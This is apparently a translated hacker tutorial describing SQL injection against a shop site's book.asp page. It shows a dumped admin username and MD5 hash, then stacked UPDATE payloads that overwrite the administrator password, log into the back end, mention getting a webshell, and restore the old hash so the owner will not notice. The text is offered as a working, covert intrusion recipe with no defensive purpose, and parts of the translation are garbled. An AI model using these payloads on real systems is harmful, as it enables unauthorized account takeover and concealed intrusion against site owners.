Injection modified system administrator password practical skills

injection point has been found: xxx.com/book.asp?id=1996 I have just detected with NB. As you can see, there is a table segment shop_admin. However, the password is MD5 encrypted: [adminid]: 24 [admin]:zhuyaod [password]:d4716077c2ba075c Let's try to deceive. It can be seen that deception is no trick. what is it now? Do you want to run a password? How much time and memory is it wasted? Let me introduce a new method: injection. The injection statement is as follows: ;update shop_admin set password=’new MD5 encryption password & rsquo; where password=’d4716077c2ba075c’-- For example, I need to change the zhuyaod password to wmmhacker, we must first obtain wmmhacker after MD5 encryption The twelve-digit password can be converted here with the tool of Ming Xiaozi. Wmmhacker - f8dc763194f29433 ;update shop_admin set password=’f8dc763194f29433’ where password=’d4716077c2ba075c’-- Let's test. I saw that the page did not return an error, indicating success. Now let's re-guess the password under the shop_admin table. [adminid]:24 [admin]:zhuyaod [password]:f8dc763194f29433 Let's compare it and it has changed. Now we can log in. Come in. Ha ha. It’s here. It is worth mentioning that we entered the background and then tried to get WEBSHELL. Then, don't forget to restore the administrator password. Otherwise he will find drops! ;update shop_admin set password=’d4716077c2ba075c’ where password=’f8dc763194f29433’--